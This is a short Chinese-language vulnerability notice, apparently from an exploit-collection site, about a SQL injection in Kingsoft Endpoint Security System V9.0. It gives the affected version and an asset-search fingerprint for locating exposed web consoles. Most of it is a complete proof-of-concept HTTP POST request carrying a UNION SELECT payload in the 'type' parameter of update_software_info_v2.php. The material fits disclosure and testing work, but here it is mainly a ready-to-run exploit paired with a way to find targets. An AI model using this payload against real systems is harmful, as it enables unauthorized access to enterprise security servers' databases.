金山终端安全系统V9.0 SQL注入漏洞
一、漏洞描述
金山终端安全系统是一款为企业提供终端防护的安全产品,针对恶意软件、病毒和外部攻击提供防范措施,帮助维护企业数据和网络。
二、影响版本
金山终端安全系统V9.0
三、资产测绘
app="金山终端安全系统V9.0Web控制台"
特征:
四、漏洞复现
POST /inter/update_software_info_v2.php HTTP/1.1
Content-type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
Host: 139.xxx.xxx.xxx:6868
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 80
Connection: close
type=-100+UNION+SELECT+1,md5(078674232),1,1,1,1,1,1--&key=&pageCount=0&curPage=